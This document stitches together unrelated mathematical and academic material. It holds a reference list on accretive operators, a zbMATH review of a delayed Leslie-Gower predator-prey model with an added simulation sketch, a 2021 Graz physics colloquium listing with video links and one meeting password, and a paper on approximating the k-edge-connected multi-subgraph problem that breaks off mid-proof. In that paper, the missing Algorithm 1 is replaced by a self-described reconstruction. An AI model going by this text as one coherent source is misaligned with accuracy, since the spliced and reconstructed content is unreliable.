• [4] R. E. Bruck Jr., Properties of fixed-point sets of nonexpansive mappings in Banach spaces, Trans. Amer. Math. Soc., 179 (1973), 251–262.
• [5] L.-C. Ceng, Q. H. Ansari, S. Schaible, J.-C. Yao, Hybrid viscosity approximation method for zeros of m-accretive operators in Banach spaces, Numer. Funct. Anal. Optim., 33 (2012), 142–165.
• [6] L.-C. Ceng, Q. H. Ansari, J.-C. Yao, Mann-type steepest-descent and modified hybrid steepest-descent methods for variational inequalities in Banach spaces, Numer. Funct. Anal. Optim., 29 (2008), 987–1033.
• [7] L.-C. Ceng, A. R. Khan, Q. H. Ansari, J.-C. Yao, Strong convergence of composite iterative schemes for zeros of m-accretive operators in Banach spaces, Nonlinear Anal., 70 (2009), 1830–1840.
• [8] L.-C. Ceng, H.-K. Xu, J.-C. Yao, Strong convergence of an iterative method with perturbed mappings for nonexpansive and accretive operators, Numer. Funct. Anal. Optim., 29 (2008), 324–345.
• [9] H.-H. Cui, M.-L. Su, On sufficient conditions ensuring the norm convergence of an iterative sequence to zeros of accretive operators, Appl. Math. Comput., 258 (2015), 67–71.
• [10] P. E. Maingé, Strong convergence of projected subgradient methods for nonsmooth and nonstrictly convex minimization, Set-Valued Anal., 16 (2008), 899–912.
• [11] Y.-L. Song, L.-C. Ceng, A general iteration scheme for variational inequality problem and common fixed point problems of nonexpansive mappings in q-uniformly smooth Banach spaces, J. Global Optim., 57 (2013), 1327–1348.
• [12] W. Takahashi, Proximal point algorithms and four resolvents of nonlinear operators of monotone type in Banach spaces, Taiwanese J. Math., 12 (2008), 1883–1910.
• [13] S.-H. Wang, P. Zhang, Some results on an infinite family of accretive operators in a reflexive Banach space, Fixed Point Theory Appl., 2015 (2015), 11 pages.
• [14] L. Wei, R. P. Agarwal, Iterative algorithms for infinite accretive mappings and applications to p-Laplacian-like differential systems, Fixed Point Theory Appl., 2016 (2016), 23 pages.
• [15] L. Wei, R. P. Agarwal, P. Y. J. Wong, New method for the existence and uniqueness of solution of nonlinear parabolic equation, Bound. Value Probl., 2015 (2015), 18 pages.
• [16] L. Wei, Y.-C. Ba, R. P. Agarwal, New ergodic convergence theorems for non-expansive mappings and m-accretive mappings, J. Inequal. Appl., 2016 (2016), 20 pages.
• [17] L. Wei, R.-L. Tan, Iterative scheme with errors for common zeros of finite accretive mappings and nonlinear elliptic system, Abstr. Appl. Anal., 2014 (2014), 9 pages.
• [18] H.-K. Xu, Iterative algorithms for nonlinear operators, J. London Math. Soc., 66 (2002), 240–256.
• [19] H.-K. Xu, Strong convergence of an iterative method for nonexpansive and accretive operators, J. Math. Anal. Appl., 314 (2006), 631–643. |
# zbMATH — the first resource for mathematics
Stability and Hopf bifurcations in a delayed Leslie-Gower predator-prey system. (English) Zbl 1170.34051
The delayed Leslie-Gower (LG) predator-prey system $$x^{\prime}(t) = r_1 x(t) \biggl(1 - \frac{x(t-\tau)}{K} \biggr) - m x(t) y(t),$$ $$y^{\prime}(t) = r_2 y(t) \biggl(1 - \frac{y(t)}{\gamma x(t)} \biggr)$$ is studied. The delay $\tau$ is considered as the bifurcation parameter, and the characteristic equation of the linearized system at the positive equilibrium is analysed. It is shown that Hopf bifurcations can occur as the delay crosses some critical values. The main contribution of this paper is that the linear stability of the system is investigated and Hopf bifurcations are demonstrated. Conditions ensuring the existence of a global Hopf bifurcation are given, i.e., when $r_1 > 2mK\gamma$, the LG system has at least $j$ periodic solutions for $\tau > \tau_j^{+}$ $(j\geq 1)$. The formulae determining the direction of the bifurcations and the stability of the bifurcating periodic solutions are given by using the normal form theory and the center manifold theorem. Numerical simulations are also included. Based on the global Hopf bifurcation result of {\it J. Wu} [Trans. Am. Math. Soc. 350, No. 12, 4799--4838 (1998; Zbl 0905.34034)] for functional differential equations, the authors demonstrate the global existence of periodic solutions.
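The review mentions numerical simulations; as a rough illustration of how the delayed LG system can be integrated, here is a fixed-step Euler sketch with a constant initial history. All parameter values in the demo are invented and not taken from the paper; for a small delay the trajectory should settle near the positive equilibrium $x^* = r_1 K/(r_1 + m\gamma K)$, $y^* = \gamma x^*$.

```python
def simulate_leslie_gower(r1, r2, K, m, gamma, tau, x0, y0, dt=1e-3, T=50.0):
    """Fixed-step Euler integration of the delayed Leslie-Gower system
        x'(t) = r1*x(t)*(1 - x(t - tau)/K) - m*x(t)*y(t)
        y'(t) = r2*y(t)*(1 - y(t)/(gamma*x(t)))
    with constant history x(t) = x0 for t <= 0. Illustrative sketch only,
    not the computations from the paper."""
    lag = int(round(tau / dt))
    xs = [x0] * (lag + 1)   # history buffer: xs[0] is x(t - tau), xs[-1] is x(t)
    x, y = x0, y0
    for _ in range(int(T / dt)):
        x_delayed = xs[0]
        dx = r1 * x * (1.0 - x_delayed / K) - m * x * y
        dy = r2 * y * (1.0 - y / (gamma * x))
        x, y = x + dt * dx, y + dt * dy
        xs.pop(0)
        xs.append(x)
    return x, y

# With these (made-up) parameters the equilibrium is x* = y* = 2/3, and the
# delay tau = 0.2 is small enough that the trajectory settles near it.
x, y = simulate_leslie_gower(r1=1.0, r2=0.5, K=1.0, m=0.5, gamma=1.0,
                             tau=0.2, x0=0.5, y0=0.5)
print(x, y)
```

Pushing `tau` past the critical values studied in the paper is where the Hopf bifurcation would appear: the trajectory then approaches a periodic orbit instead of the equilibrium.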
##### MSC:
34K18 Bifurcation theory of functional differential equations
34K60 Qualitative investigation and simulation of models
92D25 Population dynamics (general)
34K13 Periodic solutions of functional differential equations
34K20 Stability theory of functional-differential equations
##### References:
[1] Wu, J.: Symmetric functional differential equations and neural networks with memory, Trans. Amer. Math. Soc. 350, 4799-4838 (1998) · Zbl 0905.34034 · doi:10.1090/S0002-9947-98-02083-2
[2] Braza, P. A.: The bifurcation structure of the Holling-Tanner model for predator-prey interactions using two-timing, SIAM J. Appl. Math. 63, 898-904 (2003) · Zbl 1035.34043 · doi:10.1137/S0036139901393494
[3] Collings, J. B.: Bifurcation and stability analysis for a temperature-dependent mite predator-prey interaction model incorporating a prey refuge, Bull. Math. Biol. 57, 63-76 (1995) · Zbl 0810.92024
[4] Hsu, S. B.; Huang, T. W.: Global stability for a class of predator-prey systems, SIAM J. Appl. Math. 55, 763-783 (1995) · Zbl 0832.34035 · doi:10.1137/S0036139993253201
[5] Hsu, S. B.; Huang, T. W.: Hopf bifurcation analysis for a predator-prey system of Holling and Leslie type, Taiwanese J. Math. 3, 35-53 (1999) · Zbl 0935.34035
[6] May, R. M.: Stability and complexity in model ecosystems, (1974)
[7] Tanner, J. T.: The stability and the intrinsic growth rates of prey and predator populations, Ecology 56, 855-867 (1975)
[8] Cushing, J. M.: Integrodifferential equations and delay models in population dynamics, (1977) · Zbl 0363.92014
[9] Gopalsamy, K.: Harmless delay in model systems, Bull. Math. Biol. 45, 295-309 (1983) · Zbl 0514.34060
[10] Kuang, Y.: Delay differential equations with applications in population dynamics, (1993) · Zbl 0777.34002
[11] Beretta, E.; Kuang, Y.: Convergence results in a well-known delayed predator-prey system, J. Math. Anal. Appl. 204, 840-853 (1996) · Zbl 0876.92021 · doi:10.1006/jmaa.1996.0471
[12] Beretta, E.; Kuang, Y.: Global analysis in some delayed ratio-dependent predator-prey systems, Nonlinear Anal. 32, 381-408 (1998) · Zbl 0946.34061 · doi:10.1016/S0362-546X(97)00491-4
[13] Faria, T.; Magalhães, L. T.: Normal form for retarded functional differential equations and applications to Bogdanov-Takens singularity, J. Differential Equations 122, 201-224 (1995) · Zbl 0836.34069 · doi:10.1006/jdeq.1995.1145
[14] Gopalsamy, K.: Delayed responses and stability in two-species systems, J. Austral. Math. Soc. (Ser. B) 25, 473-500 (1984) · Zbl 0552.92016 · doi:10.1017/S0334270000004227
[15] Gopalsamy, K.: Stability and oscillations in delay differential equations of population dynamics, (1992) · Zbl 0752.34039
[16] May, R. M.: Time delay versus stability in population models with two and three trophic levels, Ecology 4, 315-325 (1973)
[17] Song, Y.; Wei, J.: Local Hopf bifurcation and global periodic solutions in a delayed predator-prey system, J. Math. Anal. Appl. 301, 1-21 (2005) · Zbl 1067.34076 · doi:10.1016/j.jmaa.2004.06.056
[18] Xiao, D.; Ruan, S.: Multiple bifurcations in a delayed predator-prey system with nonmonotonic functional response, J. Differential Equations 176, 494-510 (2001) · Zbl 1003.34064 · doi:10.1006/jdeq.2000.3982
[19] Liu, Z.; Yuan, R.: Stability and bifurcation in a delayed predator-prey system with Beddington-DeAngelis functional response, J. Math. Anal. Appl. 296, 521-537 (2004) · Zbl 1051.34060 · doi:10.1016/j.jmaa.2004.04.051
[20] Hutchinson, G. E.: Circular cause systems in ecology, Ann. New York Acad. Sci. 50, 221-246 (1948)
[21] Leslie, P. H.; Gower, J. C.: The properties of a stochastic model for the predator-prey type of interaction between two species, Biometrika 47, 219-234 (1960) · Zbl 0103.12502
[22] Faria, T.; Magalhães, L. T.: Normal form for retarded functional differential equations with parameters and applications to Hopf bifurcation, J. Differential Equations 122, 181-200 (1995) · Zbl 0836.34068 · doi:10.1006/jdeq.1995.1144
[23] Chow, S.-N.; Hale, J. K.: Methods of bifurcation theory, (1982) · Zbl 0487.47039
[24] Yan, X.; Li, W.: Hopf bifurcation and global periodic solutions in a delayed predator-prey system, Appl. Math. Comput. 177, 427-445 (2006) · Zbl 1090.92052 · doi:10.1016/j.amc.2005.11.020
[25] Yan, X.; Zhang, C.: Hopf bifurcation in a delayed Lotka-Volterra predator-prey system, Nonlinear Anal. Real World Appl. 9, 114-127 (2008) · Zbl 1149.34048 · doi:10.1016/j.nonrwa.2006.09.007
Karl Franzens University Graz / Graz University of Technology
## TUG/KFU Physics Colloquium Summer 2021
**Tuesday 02 March 2021, 16:15–17:15, KFU – Online (Zoom)**
*Physics and Applications of Epsilon-Near-Zero Materials*
Robert W. Boyd, University of Ottawa
In this talk, we describe some of the properties of light propagation through a material for which the dielectric permittivity, and hence the refractive index, is nearly vanishing. Among other unusual optical properties, we find that such epsilon-near-zero (ENZ) materials display …
Video: https://us02web.zoom.us/j/81876426812

**Tuesday 09 March 2021, 16:15–17:15, TUG – Online**
*2D and 3D SEM-based electron diffraction techniques as central tools for correlative microscopy to obtain new insights into microstructure physics and chemistry*
Stefan Zaefferer, Max Planck Institute for Iron Research, Duesseldorf (https://www.mpie.de/2890931/microscopy_and_diffraction)
The scanning electron microscope (SEM) offers two electron diffraction techniques that allow one to obtain comprehensive and quantitative information about the crystalline microstructure of materials, namely electron backscatter diffraction (EBSD) with all its facets and variations, …
Video: https://tugraz.webex.com/meet/gerald.kothleitner

**Tuesday 23 March 2021, 16:15–17:15, TUG – Online**
*Amon-based Quantum Machine Learning*
Anatole von Lilienfeld, University of Vienna (https://www.chemspacelab.org/head-of-lab/)
Many of the most relevant observables of matter depend explicitly on atomistic and electronic details, rendering a first principles approach to computational materials design mandatory. Alas, even when using high-performance computers, brute force high-throughput screening of mat…

**Tuesday 20 April 2021, 16:15–17:15, Graz University of Technology – Online**
*Nanoporous materials for hydrogen isotope separation*
Dr. Michael Hirscher, Max-Planck-Institut für Intelligente Systeme (formerly Max-Planck-Institut für Metallforschung), Stuttgart (https://mms.is.mpg.de/research_fields/hydrogen-storage)
One of the important operations in the chemical industry is the separation and purification of gaseous products. Especially H$_2$/D$_2$ isotope separation is a difficult task, since their size, shape and thermodynamic properties resemble each other. Porous materials offer two different mech…
Video: https://tugraz.webex.com/tugraz/j.php?MTID=m515e47db70524775a7f5460d95f963c6

**Tuesday 27 April 2021, 16:15–17:15, KFU HS 5.01**
*Quantum magnonics – Quantum optics with magnons*
Silvia Viola-Kusminskiy, Max Planck Institute for the Science of Light
In the last five years, a new field has emerged at the intersection between Condensed Matter and Quantum Optics, denominated "Quantum Magnonics". This field strives to control the elementary excitations of magnetic materials, denominated magnons, to the level of the single quantum, …
Video: https://us02web.zoom.us/j/84587309911

**Tuesday 04 May 2021, 16:15–17:15, Graz University of Technology – Online**
*Laser Picoscopy: Seeing valence electrons in solids with sub-Angstrom resolution*
Prof. Dr. Eleftherios Goulielmakis, University of Rostock
The wavelength of visible light is often assumed to impose a fundamental frontier in optical microscopy. Indeed, the Abbe limit constrains the resolution of optical techniques to tens or hundreds of nanometers and makes visible light inadequate for electron-level imaging of the m…
Video: https://1drv.ms/u/s!AtN8DP2nnqYUgbUOvP3tZpwlIdly9A?e=0TSst3

**Tuesday 11 May 2021, 16:15–17:15, KFU – Online**
*Momentum-Space Movies of Electrons at Interfaces and in 2D Semiconductors*
Ulrich Höfer, University of Marburg
Time-resolved photoemission combines femtosecond pump-probe techniques with angle-resolved photoelectron spectroscopy (ARPES). New opportunities for this powerful technique arise in combination with THz excitation on the one hand and ultrashort XUV probe pulses on the other. I w…

**Tuesday 18 May 2021, 16:15–17:15, Graz University of Technology – Online**
*Developments in High Speed Structural Imaging of Low Dimensional Materials*
Prof. Angus Kirkland, University of Oxford
I will describe recent work using high speed direct electron detectors and artificial intelligence / machine learning to automatically map defect transitions in graphene. I will also discuss the use of similar detectors in electron ptychography, in particular under extremely low …

**Tuesday 08 June 2021, 16:15–17:15, TUG – Online**
*Polymer Films, Structures, and Devices by Initiated and Oxidative Chemical Vapor Deposition*
Kenneth K. S. Lau, Department of Chemical and Biological Engineering, Drexel University
Chemical vapor deposition (CVD) is a non-conventional route for constructing polymers as thin films, non-planar structures, and integrated devices. Polymer thin films are conventionally formed through liquid phase processing, like dip coating, spray coating and spin casting. Like…
Video: https://1513041.mediaspace.kaltura.com/media/TU+Graz+-+Colloquium+Talk/1_f86g9afn

**Tuesday 15 June 2021, 16:15–17:15, KFU – Online**
*Embedded many-body perturbation theory for the electronic properties of organic systems*
Xavier Blase, Institut Néel, CNRS, Grenoble, France
Many-body perturbation theories, such as the GW and Bethe-Salpeter formalisms, have become a tool of choice in solid-state physics for studying the optoelectronic properties of crystals. Difficulties arise when attempting to explore with such techniques extended disordered system…
Video: https://unimeet.uni-graz.at/b/pus-von-6fm-19m

**Tuesday 22 June 2021, 16:15–17:15, TUG – Online**
*Focused Electron/Ion Beam Induced Deposition for the growth of metallic, magnetic and superconducting nanostructures*
José María De Teresa, Universidad de Zaragoza, Spain
Today, nanolithography is a key enabling technology in various research and application fields. Focused Electron/Ion Beam Induced Deposition (FEBID/FIBID) nanolithography techniques stand out for the growth of functional nanomaterials with high resolution, and their use is widesp…
Video: https://felmi-zfe.webex.com/felmi-zfe-de/j.php?MTID=m1b23b6c2b772b0e44bf7c2dad2930131 (password: U4qDmmNQu54)

**Tuesday 29 June 2021, 16:15–17:15, KFU – Online**
*TBA*
Peter Hommelhoff, Friedrich-Alexander-University Erlangen
# An Improved Approximation Algorithm for the Minimum k-Edge Connected Multi-Subgraph Problem
We give a randomized 1+√(8ln k/k)-approximation algorithm for the minimum k-edge connected spanning multi-subgraph problem, k-ECSM.
## 1 Introduction
In an instance of the minimum $k$-edge connected subgraph problem, or $k$-ECSS, we are given an (undirected) graph $G = (V, E)$ with $n$ vertices and a cost function $c: E \to \mathbb{R}_{\ge 0}$, and we want to choose a minimum cost set of edges $F \subseteq E$ such that the subgraph $(V, F)$ is $k$-edge connected. In its most general form, $k$-ECSS generalizes several extensively-studied problems in network design such as tree augmentation or cactus augmentation. The $k$-edge-connected multi-subgraph problem, $k$-ECSM, is a close variant of $k$-ECSS in which we want to choose a $k$-edge-connected multi-subgraph of $G$ of minimum cost, i.e., we can choose an edge multiple times. It turns out that one can assume without loss of generality that the cost function in $k$-ECSM is a metric, i.e., for any three vertices $u, v, w$, we have $c(u,v) \le c(u,w) + c(w,v)$.
Around four decades ago, Fredrickson and Jájá [FJ81, FJ82] designed a 2-approximation algorithm for $k$-ECSS and a 3/2-approximation algorithm for $k$-ECSM. The latter essentially follows by a reduction to the well-known Christofides–Serdyukov approximation algorithm for the traveling salesperson problem (TSP). Over the last four decades, despite a number of papers on the problem [JT00, KR96, Kar99, Gab05, GG08, GGTW09, Pri11, LOS12], the aforementioned approximation factors were only improved in the cases where the underlying graph is unweighted or $k = 2$. Most notably, Gabow, Goemans, Tardos and Williamson [GGTW09] showed that if the graph is unweighted then $k$-ECSS and $k$-ECSM admit $1 + O(1/k)$ approximation algorithms, i.e., as $k \to \infty$ the approximation factor approaches 1. The special case of $k$-ECSM where $k = 2$ received significant attention and better than 3/2-approximation algorithms were designed for special cases [CR98, BFS16, SV14, BCCGISW20].
Motivated by [GGTW09], Pritchard posed the following conjecture:
###### Conjecture 1.1 ([Pri11]).
The $k$-ECSM problem admits a $1 + O(1/k)$ approximation algorithm.
In other words, if true, the above conjecture implies that the classical 3/2 factor is not optimal for sufficiently large $k$, and moreover that it is possible to design an approximation algorithm whose factor gets arbitrarily close to 1 as $k \to \infty$. In this paper, we prove a weaker version of the above conjecture.
###### Theorem 1.2 (Main).
There is a randomized algorithm for (weighted) $k$-ECSM with approximation factor (at most) $1 + \sqrt{8 \ln k / k}$.
We remark that our main theorem improves the classical 3/2-approximation algorithm for $k$-ECSM only when $k$ is sufficiently large (although one can use the more precise expression given in the proof to, for example, improve upon 3/2 for even values of $k$).
For a set $S \subseteq V$, let $\delta(S)$ denote the set of edges leaving $S$. The following is the natural linear programming relaxation for $k$-ECSM.
$$\begin{array}{lll} \min & \sum_{e \in E} x_e\, c(e) & \qquad (1)\\ \text{s.t.} & x(\delta(v)) = k & \forall v \in V\\ & x(\delta(S)) \ge k & \forall S \subseteq V\\ & x_e \ge 0 & \forall e \in E. \end{array}$$
Note that while in an optimum solution of $k$-ECSM the degree of each vertex is not necessarily equal to $k$, since the cost function satisfies the triangle inequality we may assume that in any optimum fractional solution each vertex has (fractional) degree $k$. This follows from the parsimonious property [GB93].
We prove Theorem 1.2 by rounding an optimum solution to the above linear program. So, as a corollary we also upper-bound the integrality gap of the above linear program.
###### Corollary 1.3.
The integrality gap of LP (1) is at most $1 + \sqrt{8 \ln k / k}$.
### 1.1 Proof Overview
Before explaining our algorithm, we recall a randomized rounding approach of Karger [Kar99]. Karger showed that if we choose every edge $e$ independently with probability $x_e$, then the sample is (almost) $k$-edge connected with high probability. He then fixes the connectivity of the sample by adding $O(\sqrt{k \log n})$ copies of the minimum spanning tree of $G$. This gives a $1 + O(\sqrt{\log n / k})$ approximation algorithm for the problem.
First, we observe that where $x$ is a solution to the LP (1), the vector $\frac{2}{k}x$ is in the spanning tree polytope (after modifying $x$ slightly, see Fact 2.1 for more details). Following a recent line of works on the traveling salesperson problem [OSS11, KKO20b] we write $\frac{2}{k}x$ as a $\lambda$-uniform spanning tree distribution, $\mu_\lambda$. Then, we independently sample $k/2$ spanning trees $T_1, \dots, T_{k/2}$ (if $k$ is odd, we sample $\lceil k/2 \rceil$ trees; the bound remains unchanged relative to the analysis we give below as the potential cost of one extra tree is $O(c(x)/k)$). It follows that $T^* = T_1 \uplus \dots \uplus T_{k/2}$ has the same expectation across every cut as $x$, and due to properties of $\lambda$-uniform spanning tree distributions it is concentrated around its mean. Unlike the independent rounding procedure, $T^*$ has at least $k/2$ edges across each cut with probability 1. This implies that the number of "bad" cuts of $T^*$, i.e. those of size strictly less than $k$, is at most $(n-1) \cdot k/2$ (with probability 1). This is because any tree has strictly less than 2 edges in exactly $n-1$ "tree cuts," and a cut lying on no tree cuts must have at least $2 \cdot k/2 = k$ edges in $T^*$.
We divide these potentially bad cuts into two types: (i) cuts $S$ such that $k - \alpha\sqrt{k}/2 - 1 < T^*_{\delta(S)} < k$ and (ii) cuts where $T^*_{\delta(S)} \le k - \alpha\sqrt{k}/2 - 1$, for some parameter $\alpha$. We fix all cuts of type (i) by adding $\lceil \alpha\sqrt{k}/2 \rceil + 1$ copies of the minimum spanning tree of $G$. To fix cuts of type (ii), we employ the following procedure: for any tree $T_i$ where $e \in T_i$ and $C_{T_i}(e)$ is of type (ii), we add one extra copy of the unique edge of $T_i$ in $C_{T_i}(e)$. To bound the expected cost of our rounded solution, we use the concentration property of $\lambda$-uniform trees on edges of $T^*$ to show that the probability any fixed cut is of type (ii) is exponentially small in $\alpha$, i.e., $e^{-\alpha^2/2}$, even if we condition on $e \in T$ for a single tree $T$.
### 1.2 Algorithm
For two sets of edges $A, B$, we write $A \uplus B$ to denote the multi-set union of $A$ and $B$, allowing multiple edges. Note that we always have $|A \uplus B| = |A| + |B|$.
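As an aside (an illustration, not from the paper), the multi-set union and the identity $|A \uplus B| = |A| + |B|$ can be modeled with Python's `collections.Counter`:

```python
from collections import Counter

# Edges as (u, v) tuples; Counter multiplicities track repeated edges.
A = Counter({("u", "v"): 1, ("v", "w"): 1})
B = Counter({("u", "v"): 1})

U = A + B  # multi-set union: ("u", "v") now has multiplicity 2

# |A ⊎ B| = |A| + |B| always holds for multi-set union.
assert sum(U.values()) == sum(A.values()) + sum(B.values())
```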
Let $x^0$ be an optimal solution of LP (1). We expand the graph $G$ to a graph $G'$ by picking an arbitrary vertex $u$, splitting it into two nodes $u_0$ and $v_0$, and then, for every edge $(u, v)$ incident to $u$, assigning fraction $x^0_{(u,v)}/2$ to each of the two edges $(u_0, v)$ and $(v_0, v)$ in $G'$. Call this expanded graph $G'$, its edge set $E'$, and the resulting fractional solution $x$, where $x$ and $x^0$ are identical on all other edges. (Note that each of $u_0$ and $v_0$ now has fractional degree $k/2$ in $x$.) In Fact 2.1 below, we show that $\frac{2}{k}x$ is in the spanning tree polytope for the graph $G'$. For ease of exposition, the algorithm is described as running on $G'$ (and spanning trees of $G'$; a spanning tree in $G'$ is a 1-tree in $G$, that is, a tree plus an edge), which has the same edge set as $G$ (when $u_0$ and $v_0$ are identified).
Our algorithm is as follows:
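The statement of Algorithm 1 does not survive in this copy; based on the proof overview and the analysis in Section 3, it can be sketched as follows (a reconstruction — the exact number of MST copies and the threshold are assumptions consistent with the analysis below):

```text
Algorithm 1 (sketch): rounding for k-ECSM
1. Solve LP (1) for x; form G' and z = (2/k) x; compute weights λ whose
   marginals approximately match z (Theorem 2.2).
2. Sample k/2 spanning trees T_1, ..., T_{k/2} independently from μ_λ,
   and let T* = T_1 ⊎ ... ⊎ T_{k/2}.
3. Let F contain ⌈α√k/2⌉ + 1 copies of the minimum spanning tree of G.
4. For each i and each e ∈ T_i with (u_0, v_0) ∉ C_{T_i}(e) and
   C_{T_i}(e)_{T*} ≤ k − α√k/2 − 1, add one extra copy of e to F.
5. Return T* ⊎ F.
```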
## 2 Preliminaries
For any two sets of edges $F$ and $T$, we write
$$F_T := |F \cap T|.$$
Also, for any edge weight function $c: E \to \mathbb{R}$, we write $c(F) := \sum_{e \in F} c(e)$.
For any spanning tree $T$ of $G'$, and any edge $e \in T$, we write $C_T(e)$ to denote the set of edges in the unique cut obtained by deleting $e$ from $T$. Of particular interest to us below will be $C_{T_i}(e)_{T^*}$ where $e$ is an edge in $T_i$.
### 2.1 Random Spanning Trees
Edmonds [Edm70] gave the following description for the convex hull of the spanning trees of any graph $G = (V, E)$, known as the spanning tree polytope.
$$\begin{array}{ll} z(E) = |V| - 1 & \qquad (2)\\ z(E(S)) \le |S| - 1 & \forall S \subseteq V\\ z_e \ge 0 & \forall e \in E. \end{array}$$
Edmonds [Edm70] also proved that the extreme point solutions of this polytope are the characteristic vectors of the spanning trees of $G$.
###### Fact 2.1 ([KKO20b]).
Let $x^0$ be the optimal solution of LP (1) and $x$ its extension to $G'$ as described above. Then $z = \frac{2}{k} x$ is in the spanning tree polytope (2) of $G'$.
###### Proof.
For any set $S \subseteq V'$ with $u_0, v_0 \notin S$, $z(E(S)) = \frac{1}{2}\big(\sum_{v \in S} z(\delta(v)) - z(\delta(S))\big) \le \frac{1}{2}(2|S| - 2) = |S| - 1$, using $z(\delta(v)) = 2$ for $v \ne u_0, v_0$ and $z(\delta(S)) \ge 2$. If $|S \cap \{u_0, v_0\}| = 1$, then $z(\delta(S)) \ge 1$, so $z(E(S)) \le \frac{1}{2}\big(2(|S|-1) + 1 - 1\big) = |S| - 1$. Finally, if $u_0, v_0 \in S$, then $\sum_{v \in S} z(\delta(v)) = 2|S| - 2$ and $z(\delta(S)) \ge 2$. Thus, $z(E(S)) \le |S| - 2 \le |S| - 1$. The claim follows because $z(E') = \frac{1}{2}\sum_{v \in V'} z(\delta(v)) = \frac{1}{2}\big(2(n-1) + 2\big) = n = |V'| - 1$. ∎
Given nonnegative edge weights $\lambda: E' \to \mathbb{R}_{\ge 0}$, we say a distribution $\mu_\lambda$ over spanning trees of $G'$ is $\lambda$-uniform if, for any spanning tree $T$,
$$\mathbb{P}_{T \sim \mu_\lambda}[T] \propto \prod_{e \in T} \lambda(e).$$
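For intuition, a $\lambda$-uniform distribution on a tiny graph can be computed by enumerating all spanning trees. This brute-force sketch is illustrative only (it is exponential in the graph size, unlike the polynomial-time algorithm of Theorem 2.2 below):

```python
import itertools

def lambda_uniform(vertices, edges, lam):
    """Brute-force λ-uniform spanning tree distribution for a tiny graph:
    each spanning tree T gets probability proportional to the product of
    lam[e] over its edges e."""
    def connected(tree):
        # BFS over the candidate edge set to test that it spans all vertices.
        seen = {vertices[0]}
        frontier = [vertices[0]]
        while frontier:
            v = frontier.pop()
            for a, b in tree:
                for u, w in ((a, b), (b, a)):
                    if u == v and w not in seen:
                        seen.add(w)
                        frontier.append(w)
        return len(seen) == len(vertices)

    trees = [t for t in itertools.combinations(edges, len(vertices) - 1)
             if connected(t)]
    weight = {t: 1.0 for t in trees}
    for t in trees:
        for e in t:
            weight[t] *= lam[e]
    total = sum(weight.values())
    return {t: w / total for t, w in weight.items()}

# Example: triangle graph with a doubled weight on edge ("a", "b");
# the two spanning trees containing ("a", "b") get probability 0.4 each,
# the remaining tree gets 0.2.
dist = lambda_uniform(["a", "b", "c"],
                      [("a", "b"), ("b", "c"), ("a", "c")],
                      {("a", "b"): 2.0, ("b", "c"): 1.0, ("a", "c"): 1.0})
```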
###### Theorem 2.2 ([AGMOS17]).
There is a polynomial-time algorithm that, given a connected graph $G = (V, E)$ and a point $z$ in the spanning tree polytope (2) of $G$, returns $\lambda: E \to \mathbb{R}_{\ge 0}$ such that the corresponding $\lambda$-uniform spanning tree distribution $\mu_\lambda$ satisfies
$$\sum_{T \in \mathcal{T}:\, e \in T} \mu_\lambda(T) \le (1 + 2^{-n})\, z_e, \qquad \forall e \in E,$$
i.e., the marginals are approximately preserved. In the above, $\mathcal{T}$ is the set of all spanning trees of $G$.
### 2.2 Bernoulli-Sum Random Variables
###### Definition 2.3 (Bernoulli-Sum Random Variable).
We say $X$ is a Bernoulli-Sum random variable, written $X \sim \mathrm{BS}(q)$, if it has the law of a sum of independent Bernoullis, say $X = \sum_{i=1}^m B_i$ with $B_i \sim \mathrm{Bernoulli}(p_i)$ for some $p_1, \dots, p_m \in [0, 1]$, with $q = \sum_{i=1}^m p_i = \mathbb{E}[X]$.
###### Fact 2.4.
If $X \sim \mathrm{BS}(q_X)$ and $Y \sim \mathrm{BS}(q_Y)$ are two independent Bernoulli-Sum random variables then $X + Y \sim \mathrm{BS}(q_X + q_Y)$.
###### Lemma 2.5 ([BBL09, Pit97]).
Given $G' = (V', E')$ and $\lambda: E' \to \mathbb{R}_{\ge 0}$, let $\mu_\lambda$ be the $\lambda$-uniform spanning tree distribution of $G'$. Let $T$ be a sample from $\mu_\lambda$. Then for any fixed $F \subseteq E'$, the random variable $F_T$ is distributed as $\mathrm{BS}(q)$ with $q = \mathbb{E}[F_T]$.
###### Theorem 2.6 (Multiplicative Chernoff-Hoeffding Bound for BS Random Variables).
Let $X \sim \mathrm{BS}(q)$ be a Bernoulli-Sum random variable. Then, for any $\epsilon \in (0, 1)$ and $q' \le q$,
$$\mathbb{P}\big[X < (1 - \epsilon) q'\big] \le e^{-\epsilon^2 q'/2}.$$
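A quick simulation (an illustrative aside, not from the paper) shows the bound in action for a sum of 40 fair Bernoullis, i.e. $q = 20$:

```python
import math
import random

def bernoulli_sum_sample(ps, rng):
    """One sample of X = sum of independent Bernoulli(p_i) variables."""
    return sum(rng.random() < p for p in ps)

def tail_vs_chernoff(ps, q_prime, eps, trials=20000, seed=1):
    """Empirical P[X < (1 - eps) * q'] next to the bound exp(-eps^2 q' / 2)."""
    rng = random.Random(seed)
    threshold = (1 - eps) * q_prime
    hits = sum(bernoulli_sum_sample(ps, rng) < threshold for _ in range(trials))
    return hits / trials, math.exp(-eps ** 2 * q_prime / 2)

# 40 fair coins: q = 20. For eps = 0.5 the bound is exp(-2.5) ≈ 0.082,
# while the true tail P[X < 10] is far smaller, so the bound holds easily.
empirical, bound = tail_vs_chernoff([0.5] * 40, q_prime=20, eps=0.5)
```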
## 3 Analysis of the Algorithm
In this section we prove Theorem 1.2. We first observe that the cuts of $G$ are precisely the cuts of $G'$ that have $u_0$ and $v_0$ on the same side of the cut, and for any such cut the set of edges crossing the cut in $G$ and in $G'$ is the same (once $u_0$ and $v_0$ are contracted). We begin by showing that the output of Algorithm 1 is $k$-edge connected (in $G$) with probability 1.
###### Lemma 3.1 (k-Connectivity of the Output).
For any $\alpha \ge 0$, the output $T^* \uplus F$ of Algorithm 1 is a $k$-edge connected subgraph of $G$.
###### Proof.
